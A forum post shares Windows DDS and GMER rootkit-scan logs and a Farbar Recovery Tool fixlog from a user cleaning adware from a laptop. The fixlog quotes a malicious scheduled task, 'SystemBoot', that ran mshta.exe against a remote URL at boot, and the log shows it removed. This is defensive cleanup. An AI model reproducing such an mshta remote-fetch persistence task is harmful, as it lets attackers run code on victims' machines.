R3 k57nd60a;Broadcom NetLink (TM) Gigabit Ethernet - NDIS 6.0;C:\windows\System32\drivers\k57nd60a.sys [2010-6-7 406056]
R3 klkbdflt;Kaspersky Lab KLKBDFLT;C:\windows\System32\drivers\klkbdflt.sys [2012-9-3 29280]
R3 klmouflt;Kaspersky Lab KLMOUFLT;C:\windows\System32\drivers\klmouflt.sys [2012-9-3 29280]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-10-23 172192]
S3 btusbflt;Bluetooth USB Filter;C:\windows\System32\drivers\btusbflt.sys [2010-9-2 54824]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\windows\System32\ieetwcollector.exe [2014-6-12 111616]
S3 JMCR;JMCR;C:\windows\System32\drivers\jmcr.sys [2010-9-2 160880]
S3 netw5v64;Intel(R) Wireless WiFi Link 5000 Series Adapter Driver for Windows Vista 64 Bit;C:\windows\System32\drivers\netw5v64.sys [2009-6-10 5434368]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;C:\windows\System32\drivers\rdpvideominiport.sys [2013-7-21 19456]
S3 tapstrong;StrongVPN Adapter;C:\windows\System32\drivers\tapstrong.sys [2013-11-23 38760]
S3 TsUsbFlt;TsUsbFlt;C:\windows\System32\drivers\TsUsbFlt.sys [2013-11-14 56832]
S3 USBAAPL64;Apple Mobile USB Driver;C:\windows\System32\drivers\usbaapl64.sys [2012-12-13 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\windows\System32\Wat\WatAdminSvc.exe [2013-7-17 1255736]
S3 wsvd;wsvd;C:\windows\System32\drivers\wsvd.sys [2009-7-21 121840]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== Created Last 30 ================
.
2014-06-25 02:30:43 10779000 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{05C4A088-0ED5-4CEA-A347-63B03AA5EA0E}\mpengine.dll
2014-06-25 00:32:36 -------- d-----w- C:\Users\tk\AppData\Local\Fuze Box
2014-06-20 03:05:17 -------- d-----w- C:\Users\tk\AppData\Roaming\VERIZON
2014-06-12 16:07:31 801280 ----a-w- C:\windows\System32\usp10.dll
2014-06-01 01:35:19 -------- d-----w- C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-06-01 01:35:19 -------- d-----w- C:\Program Files\iTunes
2014-06-01 01:35:19 -------- d-----w- C:\Program Files\iPod
2014-06-01 01:35:19 -------- d-----w- C:\Program Files (x86)\iTunes
2014-05-31 00:37:55 98216 ----a-w- C:\windows\SysWow64\WindowsAccessBridge-32.dll
2014-05-27 12:49:19 -------- d-----r- C:\Users\tk\Dropbox
2014-05-27 12:48:08 -------- d-----w- C:\Users\tk\AppData\Roaming\DropboxMaster
2014-05-27 02:16:22 -------- d-----w- C:\Program Files (x86)\YNAB 4
.
==================== Find3M ====================
.
2014-06-12 15:32:47 92768 ----a-w- C:\windows\System32\drivers\klflt.sys
2014-06-08 09:13:05 506368 ----a-w- C:\windows\System32\aepdu.dll
2014-06-08 09:08:04 424448 ----a-w- C:\windows\System32\aeinv.dll
2014-05-30 10:02:37 2724864 ----a-w- C:\windows\System32\mshtml.tlb
2014-05-30 10:02:09 4096 ----a-w- C:\windows\System32\ieetwcollectorres.dll
2014-05-30 09:39:43 548352 ----a-w- C:\windows\System32\vbscript.dll
2014-05-30 09:39:23 66048 ----a-w- C:\windows\System32\iesetup.dll
2014-05-30 09:38:29 48640 ----a-w- C:\windows\System32\ieetwproxystub.dll
2014-05-30 09:21:23 139264 ----a-w- C:\windows\System32\ieUnatt.exe
2014-05-30 09:21:05 111616 ----a-w- C:\windows\System32\ieetwcollector.exe
2014-05-30 09:20:36 752640 ----a-w- C:\windows\System32\jscript9diag.dll
2014-05-30 09:11:24 940032 ----a-w- C:\windows\System32\MsSpellCheckingFacility.exe
2014-05-30 09:08:22 5782528 ----a-w- C:\windows\System32\jscript9.dll
2014-05-30 09:02:39 2724864 ----a-w- C:\windows\SysWow64\mshtml.tlb
2014-05-30 08:55:36 38400 ----a-w- C:\windows\System32\JavaScriptCollectionAgent.dll
2014-05-30 08:44:28 455168 ----a-w- C:\windows\SysWow64\vbscript.dll
2014-05-30 08:43:06 61952 ----a-w- C:\windows\SysWow64\iesetup.dll
2014-05-30 08:42:16 51200 ----a-w- C:\windows\SysWow64\ieetwproxystub.dll
2014-05-30 08:28:33 112128 ----a-w- C:\windows\SysWow64\ieUnatt.exe
2014-05-30 08:27:56 592896 ----a-w- C:\windows\SysWow64\jscript9diag.dll
2014-05-30 08:24:19 1249280 ----a-w- C:\windows\System32\mshtmlmedia.dll
2014-05-30 08:23:22 2040832 ----a-w- C:\windows\System32\inetcpl.cpl
2014-05-30 08:10:46 32256 ----a-w- C:\windows\SysWow64\JavaScriptCollectionAgent.dll
2014-05-30 07:56:56 2266112 ----a-w- C:\windows\System32\wininet.dll
2014-05-30 07:56:50 4244992 ----a-w- C:\windows\SysWow64\jscript9.dll
2014-05-30 07:50:09 1068032 ----a-w- C:\windows\SysWow64\mshtmlmedia.dll
2014-05-30 07:49:38 1964544 ----a-w- C:\windows\SysWow64\inetcpl.cpl
2014-05-30 07:21:10 1790976 ----a-w- C:\windows\SysWow64\wininet.dll
2014-05-14 13:14:14 70832 ----a-w- C:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-05-14 13:14:14 692400 ----a-w- C:\windows\SysWow64\FlashPlayerApp.exe
2014-05-08 09:32:11 3178496 ----a-w- C:\windows\System32\rdpcorets.dll
2014-05-08 09:32:11 16384 ----a-w- C:\windows\System32\RdpGroupPolicyExtension.dll
2014-04-25 02:06:17 626688 ----a-w- C:\windows\SysWow64\usp10.dll
2014-04-24 21:14:00 138664 ----a-w- C:\windows\SysWow64\drivers\AnyDVD.sys
2014-04-24 21:14:00 138664 ----a-w- C:\windows\System32\drivers\AnyDVD.sys
2014-04-15 09:34:10 1070232 ----a-w- C:\windows\SysWow64\MSCOMCTL.OCX
2014-04-12 02:22:05 95680 ----a-w- C:\windows\System32\drivers\ksecdd.sys
2014-04-12 02:22:05 155072 ----a-w- C:\windows\System32\drivers\ksecpkg.sys
2014-04-12 02:19:38 29184 ----a-w- C:\windows\System32\sspisrv.dll
2014-04-12 02:19:38 136192 ----a-w- C:\windows\System32\sspicli.dll
2014-04-12 02:19:37 28160 ----a-w- C:\windows\System32\secur32.dll
2014-04-12 02:19:32 1460736 ----a-w- C:\windows\System32\lsasrv.dll
2014-04-12 02:19:05 31232 ----a-w- C:\windows\System32\lsass.exe
2014-04-12 02:12:06 22016 ----a-w- C:\windows\SysWow64\secur32.dll
2014-04-12 02:10:56 96768 ----a-w- C:\windows\SysWow64\sspicli.dll
2014-04-05 02:47:20 1903552 ----a-w- C:\windows\System32\drivers\tcpip.sys
2014-04-05 02:47:09 288192 ----a-w- C:\windows\System32\drivers\FWPKCLNT.SYS
2014-04-03 02:52:39 458336 ----a-w- C:\windows\System32\drivers\kl1.sys
2014-04-03 02:52:39 29792 ----a-w- C:\windows\System32\drivers\klim6.sys
2014-03-31 16:35:08 270496 ------w- C:\windows\System32\MpSigStub.exe
.
============= FINISH: 20:01:41.03 ===============



.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 7 Home Premium
Boot Device: \Device\HarddiskVolume1
Install Date: 7/14/2013 9:21:19 PM
System Uptime: 6/24/2014 6:17:32 AM (14 hours ago)
.
Motherboard: LENOVO | | KL2
Processor: Intel(R) Core(TM) i7-2630QM CPU @ 2.00GHz | CPU | 2001/100mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 420 GiB total, 55.078 GiB free.
D: is FIXED (NTFS) - 30 GiB total, 27.625 GiB free.
E: is CDROM ()
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
RP113: 6/24/2014 7:27:40 PM - Removed Evernote v. 5.4
RP114: 6/24/2014 7:30:28 PM - Windows Update
RP115: 6/24/2014 7:52:11 PM - Uniblue SpeedUpMyPC installation
.
==== Installed Programs ======================
.
Acrobat.com
Adobe AIR
Adobe Flash Player 12 ActiveX
Adobe Flash Player 13 Plugin
Adobe Reader XI (11.0.07)
Amazon Kindle
Amazon MP3 Downloader 1.0.18
AnyDVD
Apple Application Support
Apple Mobile Device Support
Apple Software Update
ATI Catalyst Install Manager
Audible Download Manager
BodyMedia SYNC
Bonjour
Broadcom Gigabit NetLink Controller
Catalyst Control Center - Branding
Catalyst Control Center Graphics Previews Common
Catalyst Control Center Graphics Previews Vista
Catalyst Control Center InstallProxy
Catalyst Control Center Localization All
ccc-core-static
ccc-utility64
CCC Help Chinese Standard
CCC Help Chinese Traditional
CCC Help Czech
CCC Help Danish
CCC Help Dutch
CCC Help English
CCC Help Finnish
CCC Help French
CCC Help German
CCC Help Greek
CCC Help Hungarian
CCC Help Italian
CCC Help Japanese
CCC Help Korean
CCC Help Norwegian
CCC Help Polish
CCC Help Portuguese
CCC Help Russian
CCC Help Spanish
CCC Help Swedish
CCC Help Thai
CCC Help Turkish
CCleaner
Cisco Connect
CloneDVD2
Coupon Printer for Windows
CrashPlan
D3DX10
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition
Dropbox
Energy Management
Fuze Meeting
Google Chrome
Google Drive
Google Update Helper
HandBrake 0.9.9.1
HP Deskjet 1050 J410 series Basic Device Software
HP Deskjet 1050 J410 series Help
HP Update
HPDiagnosticAlert
Intel(R) Management Engine Components
Intel(R) Rapid Storage Technology
iTunes
Java 7 Update 60
Java Auto Updater
JMicron Flash Media Controller Driver
Junk Mail filter update
Kaspersky PURE 3.0
Lenovo Bluetooth with Enhanced Data Rate Software
Lenovo DirectShare
Lenovo EasyCamera
Lenovo MuteSync
Lenovo OneKey Recovery
Lenovo SlideNav
Lenovo YouCam
Mesh Runtime
Microsoft .NET Framework 4.5.1
Microsoft Application Error Reporting
Microsoft Office 2010
Microsoft Office Access MUI (English) 2010
Microsoft Office Access Setup Metadata MUI (English) 2010
Microsoft Office Excel MUI (English) 2010
Microsoft Office Groove MUI (English) 2010
Microsoft Office InfoPath MUI (English) 2010
Microsoft Office Office 64-bit Components 2010
Microsoft Office OneNote MUI (English) 2010
Microsoft Office Outlook MUI (English) 2010
Microsoft Office PowerPoint MUI (English) 2010
Microsoft Office Professional Plus 2010
Microsoft Office Proof (English) 2010
Microsoft Office Proof (French) 2010
Microsoft Office Proof (Spanish) 2010
Microsoft Office Proofing (English) 2010
Microsoft Office Publisher MUI (English) 2010
Microsoft Office Shared 64-bit MUI (English) 2010
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010
Microsoft Office Shared MUI (English) 2010
Microsoft Office Shared Setup Metadata MUI (English) 2010
Microsoft Office Word MUI (English) 2010
Microsoft Silverlight
Microsoft SQL Server 2005 Compact Edition [ENU]
Microsoft Visual C++ 2005 Redistributable
Mozilla Firefox 30.0 (x86 en-US)
Mozilla Maintenance Service
MSVCRT
MSVCRT_amd64
Oasis2Service 1.0
Onekey Theater
QuickTime 7
Realtek HDMI Audio Driver for ATI
Realtek High Definition Audio Driver
Security Update for Microsoft .NET Framework 4.5.1 (KB2898869)
Security Update for Microsoft .NET Framework 4.5.1 (KB2901126)
Security Update for Microsoft .NET Framework 4.5.1 (KB2931368)
Security Update for Microsoft Excel 2010 (KB2826033) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2553284) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2687423) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2767915) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2810073) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2826023) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2826035) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2850016) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2878284) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2880971) 32-Bit Edition
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition
Skype™ 6.14
Synaptics Pointing Device Driver
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition
Update for Microsoft InfoPath 2010 (KB2817396) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition
Update for Microsoft Office 2010 (KB2825640) 32-Bit Edition
Update for Microsoft Office 2010 (KB2850079) 32-Bit Edition
Update for Microsoft Office 2010 (KB2878225) 32-Bit Edition
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition
Update for Microsoft Word 2010 (KB2880529) 32-Bit Edition
Windows Driver Package - Broadcom (BTHUSB) Bluetooth (04/08/2010 6.3.5.430)
Windows Driver Package - Broadcom HIDClass (07/28/2009 6.2.0.9800)
Windows Driver Package - Lenovo (ACPIVPC) System (10/19/2009 5.4.0.1)
Windows Live Communications Platform
Windows Live Essentials
Windows Live ID Sign-in Assistant
Windows Live Installer
Windows Live Language Selector
Windows Live Mail
Windows Live Mesh
Windows Live Mesh ActiveX Control for Remote Connections
Windows Live Messenger
Windows Live MIME IFilter
Windows Live Movie Maker
Windows Live Photo Common
Windows Live Photo Gallery
Windows Live PIMT Platform
Windows Live Remote Client
Windows Live Remote Client Resources
Windows Live Remote Service
Windows Live Remote Service Resources
Windows Live SOXE
Windows Live SOXE Definitions
Windows Live UX Platform
Windows Live UX Platform Language Pack
Windows Live Writer
Windows Live Writer Resources
Workout Blender
YNAB 4 version 4.3.543
.
==== Event Viewer Messages From Past Week ========
.
6/22/2014 1:12:00 PM, Error: Service Control Manager [7031] - The Windows Search service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 30000 milliseconds: Restart the service.
6/22/2014 1:12:00 PM, Error: Service Control Manager [7024] - The Windows Search service terminated with service-specific error %%-1073473535.
6/18/2014 6:57:23 AM, Error: volsnap [36] - The shadow copies of volume C: were aborted because the shadow copy storage could not grow due to a user imposed limit.
.
==== End Of File ===========================



GMER 2.1.19357 - http://www.gmer.net
Rootkit scan 2014-06-24 20:12:01
Windows 6.1.7601 Service Pack 1 x64 \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-1 WDC_WD50 rev.01.0 465.76GB
Running: 0b7y8kuc.exe; Driver: C:\Users\tk\AppData\Local\Temp\pxldipoc.sys


---- Kernel code sections - GMER 2.1 ----

INITKDBG C:\windows\system32\ntoskrnl.exe!ExDeleteNPagedLookasideList + 528 fffff800033b4000 63 bytes [00, 00, 0D, 02, 4B, 4C, 73, ...]
INITKDBG C:\windows\system32\ntoskrnl.exe!ExDeleteNPagedLookasideList + 592 fffff800033b4040 22 bytes [78, 06, 5B, 0E, 80, FA, FF, ...]

---- User code sections - GMER 2.1 ----

.text C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[1888] C:\windows\SysWOW64\ntdll.dll!NtQueryValueKey 000000007754faa8 5 bytes JMP 0000000171a819b0
.text C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[1888] C:\windows\SysWOW64\ntdll.dll!NtProtectVirtualMemory 0000000077550038 5 bytes JMP 0000000171a82066
.text C:\windows\system32\Dwm.exe[2136] C:\windows\system32\kernel32.dll!LoadLibraryW 0000000077246440 5 bytes JMP 0000000169ff0038
.text C:\windows\system32\Dwm.exe[2136] C:\windows\system32\KERNELBASE.dll!LoadLibraryExW 000007fefd1b8ef0 5 bytes JMP 000007fffd1a00b8
.text C:\windows\system32\Dwm.exe[2136] C:\windows\system32\KERNELBASE.dll!LoadLibraryExA 000007fefd1bbfd0 5 bytes JMP 000007fffd1a0038
.text C:\windows\system32\taskhost.exe[2144] C:\windows\system32\kernel32.dll!LoadLibraryW 0000000077246440 5 bytes JMP 0000000169ff0038
.text C:\windows\system32\taskhost.exe[2144] C:\windows\system32\KERNELBASE.dll!LoadLibraryExW 000007fefd1b8ef0 5 bytes JMP 000007fffd1900b8
.text C:\windows\system32\taskhost.exe[2144] C:\windows\system32\KERNELBASE.dll!LoadLibraryExA 000007fefd1bbfd0 5 bytes JMP 000007fffd190038
.text C:\windows\system32\taskhost.exe[2144] C:\windows\system32\WINMM.dll!waveOutReset 000007fefb33a38c 5 bytes JMP 000007fefd1902b8
.text C:\windows\system32\taskhost.exe[2144] C:\windows\system32\WINMM.dll!waveOutPause 000007fefb354b60 5 bytes JMP 000007fefd190238
.text C:\windows\system32\taskhost.exe[2144] C:\windows\system32\WINMM.dll!waveOutRestart 000007fefb354ba0 5 bytes JMP 000007fefd1901b8
.text C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe[3280] C:\windows\system32\kernel32.dll!LoadLibraryW 0000000077246440 5 bytes JMP 0000000169ff0038
.text C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe[3320] C:\windows\system32\DDRAW.dll!DirectDrawCreate 000007fef265815c 5 bytes JMP 000007fefd1a01b8
.text C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe[3320] C:\windows\system32\DDRAW.dll!DirectDrawCreateEx 000007fef2658968 5 bytes JMP 000007fefd1a0238
.text C:\Program Files\Synaptics\SynTP\SynTPEnh.exe[3344] C:\windows\system32\kernel32.dll!LoadLibraryW 0000000077246440 5 bytes JMP 0000000169ff0038
.text C:\Program Files\Synaptics\SynTP\SynTPEnh.exe[3344] C:\windows\system32\WINMM.dll!waveOutReset 000007fefb33a38c 5 bytes JMP 000007fefd1902b8
.text C:\Program Files\Synaptics\SynTP\SynTPEnh.exe[3344] C:\windows\system32\WINMM.dll!waveOutPause 000007fefb354b60 5 bytes JMP 000007fefd190238
.text C:\Program Files\Synaptics\SynTP\SynTPEnh.exe[3344] C:\windows\system32\WINMM.dll!waveOutRestart 000007fefb354ba0 5 bytes JMP 000007fefd1901b8
.text C:\Program Files\Synaptics\SynTP\SynTPEnh.exe[3344] C:\windows\system32\ole32.dll!CoCreateInstance 000007fefeb47490 5 bytes JMP 000007fffd190138
.text C:\Program Files\Synaptics\SynTP\SynBtnAsst.exe[3388] C:\windows\system32\KERNELBASE.dll!LoadLibraryExW 000007fefd1b8ef0 5 bytes JMP 000007fffd1a00b8
.text C:\Program Files\Synaptics\SynTP\SynBtnAsst.exe[3388] C:\windows\system32\KERNELBASE.dll!LoadLibraryExA 000007fefd1bbfd0 5 bytes JMP 000007fffd1a0038
.text C:\Program Files (x86)\Lenovo\Energy Management\utility.exe[3476] C:\windows\system32\kernel32.dll!LoadLibraryW 0000000077246440 5 bytes JMP 0000000169ff0038
.text C:\Program Files (x86)\Lenovo\Energy Management\utility.exe[3476] C:\windows\system32\WINMM.dll!waveOutReset 000007fefb33a38c 5 bytes JMP 000007fefd1a02b8
.text C:\Program Files (x86)\Lenovo\Energy Management\utility.exe[3476] C:\windows\system32\WINMM.dll!waveOutPause 000007fefb354b60 5 bytes JMP 000007fefd1a0238
.text C:\Program Files (x86)\Lenovo\Energy Management\utility.exe[3476] C:\windows\system32\WINMM.dll!waveOutRestart 000007fefb354ba0 5 bytes JMP 000007fefd1a01b8
.text C:\Program Files (x86)\Lenovo\Energy Management\Energy Management.exe[3544] C:\windows\system32\kernel32.dll!LoadLibraryW 0000000077246440 5 bytes JMP 0000000169ff0038
.text C:\windows\system32\taskeng.exe[4060] C:\windows\system32\kernel32.dll!LoadLibraryW 0000000077246440 5 bytes JMP 0000000169ff0038
.text C:\windows\system32\taskeng.exe[4060] C:\windows\system32\KERNELBASE.dll!LoadLibraryExW 000007fefd1b8ef0 5 bytes JMP 000007fffd1a00b8
.text C:\windows\system32\taskeng.exe[4060] C:\windows\system32\KERNELBASE.dll!LoadLibraryExA 000007fefd1bbfd0 5 bytes JMP 000007fffd1a0038
.text C:\Program Files (x86)\CrashPlan\CrashPlanTray.exe[4144] C:\windows\syswow64\kernel32.dll!LoadLibraryExA 0000000076f048db 5 bytes JMP 0000000110002710
.text C:\Program Files (x86)\CrashPlan\CrashPlanTray.exe[4144] C:\windows\syswow64\kernel32.dll!LoadLibraryW 0000000076f048f3 5 bytes JMP 00000001100027f0
.text C:\Program Files (x86)\CrashPlan\CrashPlanTray.exe[4144] C:\windows\syswow64\kernel32.dll!LoadLibraryExW 0000000076f04925 5 bytes JMP 0000000110002780
.text C:\Users\tk\AppData\Roaming\Dropbox\bin\Dropbox.exe[4372] C:\windows\syswow64\kernel32.dll!LoadLibraryExA 0000000076f048db 5 bytes JMP 00000001002a2710
.text C:\Users\tk\AppData\Roaming\Dropbox\bin\Dropbox.exe[4372] C:\windows\syswow64\kernel32.dll!LoadLibraryW 0000000076f048f3 5 bytes JMP 00000001002a27f0
.text C:\Users\tk\AppData\Roaming\Dropbox\bin\Dropbox.exe[4372] C:\windows\syswow64\kernel32.dll!LoadLibraryExW 0000000076f04925 5 bytes JMP 00000001002a2780
.text C:\Program Files (x86)\Lenovo\Lenovo MuteSync\MuteSync.exe[4524] C:\windows\system32\KERNEL32.dll!LoadLibraryW 0000000077246440 5 bytes JMP 0000000169ff0038
.text C:\Program Files (x86)\Lenovo\Lenovo MuteSync\MuteSync.exe[4524] C:\windows\system32\KERNELBASE.dll!LoadLibraryExW 000007fefd1b8ef0 5 bytes JMP 000007fffd1a00b8
.text C:\Program Files (x86)\Lenovo\Lenovo MuteSync\MuteSync.exe[4524] C:\windows\system32\KERNELBASE.dll!LoadLibraryExA 000007fefd1bbfd0 5 bytes JMP 000007fffd1a0038
.text C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlideNavVDM.exe[4532] C:\windows\system32\KERNELBASE.dll!LoadLibraryExW 000007fefd1b8ef0 5 bytes JMP 000007fffd1a00b8
.text C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlideNavVDM.exe[4532] C:\windows\system32\KERNELBASE.dll!LoadLibraryExA 000007fefd1bbfd0 5 bytes JMP 000007fffd1a0038
.text C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlidebarNavigator.exe[4604] C:\windows\syswow64\kernel32.dll!LoadLibraryExA 0000000076f048db 5 bytes JMP 00000001003a2710
.text C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlidebarNavigator.exe[4604] C:\windows\syswow64\kernel32.dll!LoadLibraryW 0000000076f048f3 5 bytes JMP 00000001003a27f0
.text C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlidebarNavigator.exe[4604] C:\windows\syswow64\kernel32.dll!LoadLibraryExW 0000000076f04925 5 bytes JMP 00000001003a2780
.text C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe[4612] C:\windows\syswow64\kernel32.dll!LoadLibraryExA 0000000076f048db 5 bytes JMP 0000000110002710
.text C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe[4612] C:\windows\syswow64\kernel32.dll!LoadLibraryW 0000000076f048f3 5 bytes JMP 00000001100027f0
.text C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe[4612] C:\windows\syswow64\kernel32.dll!LoadLibraryExW 0000000076f04925 5 bytes JMP 0000000110002780
.text C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe[4612] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 69 0000000074fd1465 2 bytes [FD, 74]
.text C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe[4612] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 155 0000000074fd14bb 2 bytes [FD, 74]
.text ... * 2
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[3720] C:\windows\syswow64\kernel32.dll!LoadLibraryExA 0000000076f048db 5 bytes JMP 0000000110002710
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[3720] C:\windows\syswow64\kernel32.dll!LoadLibraryW 0000000076f048f3 5 bytes JMP 00000001100027f0
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[3720] C:\windows\syswow64\kernel32.dll!LoadLibraryExW 0000000076f04925 5 bytes JMP 0000000110002780
.text C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe[4164] C:\windows\system32\KERNELBASE.dll!LoadLibraryExW 000007fefd1b8ef0 5 bytes JMP 000007fffd1a00b8
.text C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe[4164] C:\windows\system32\KERNELBASE.dll!LoadLibraryExA 000007fefd1bbfd0 5 bytes JMP 000007fffd1a0038
.text C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe[3876] C:\windows\syswow64\kernel32.dll!LoadLibraryExA 0000000076f048db 5 bytes JMP 0000000100642710
.text C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe[3876] C:\windows\syswow64\kernel32.dll!LoadLibraryW 0000000076f048f3 5 bytes JMP 00000001006427f0
.text C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe[3876] C:\windows\syswow64\kernel32.dll!LoadLibraryExW 0000000076f04925 5 bytes JMP 0000000100642780
.text C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe[3876] C:\windows\syswow64\ole32.dll!CoCreateInstance 00000000766d9d0b 5 bytes JMP 0000000100642850
.text C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe[3876] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 69 0000000074fd1465 2 bytes [FD, 74]
.text C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe[3876] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 155 0000000074fd14bb 2 bytes [FD, 74]
.text ... * 2
.text C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe[3876] C:\Windows\SysWOW64\DDRAW.dll!DirectDrawCreate 000000007402859d 5 bytes JMP 0000000100643af0
.text C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe[3876] C:\Windows\SysWOW64\DDRAW.dll!DirectDrawCreateEx 000000007402ebc6 5 bytes JMP 0000000100643bb0

---- Threads - GMER 2.1 ----

Thread C:\Program Files\Windows Media Player\wmpnetwk.exe [4092:5620] 000007fefb4e2bf8

---- Registry - GMER 2.1 ----

Reg HKLM\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys\002269ec2d88
Reg HKLM\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys\889ffadda154
Reg HKLM\SYSTEM\ControlSet002\services\BTHPORT\Parameters\Keys\002269ec2d88 (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\services\BTHPORT\Parameters\Keys\889ffadda154 (not active ControlSet)

---- EOF - GMER 2.1 ----

And finally the log after I click the fix button

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version:22-06-2014
Ran by IDNABRA at 2014-06-25 11:14:57 Run:1
Running from C:\Users\idnabra\Downloads\AntiVirus
Boot Mode: Normal
==============================================
Content of fixlist:
*****************
Task: {11B37255-DD26-4677-83D6-B3DF832632FF} - System32\Tasks\SystemBoot => mshta.exe http://ahd.qboabndi.org/reg2.php?ccc...Efteq4RxdWABTk
*****************
'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{11B37255-DD26-4677-83D6-B3DF832632FF}' => Key deleted successfully.
'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{11B37255-DD26-4677-83D6-B3DF832632FF}' => Key deleted successfully.
C:\Windows\System32\Tasks\SystemBoot => Moved successfully.
'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemBoot' => Key deleted successfully.
==== End of Fixlog ====

Until now I haven't seen the PUP UP again...
I'll monitor for the next hours and will reply if its appear again

Million thanks mate....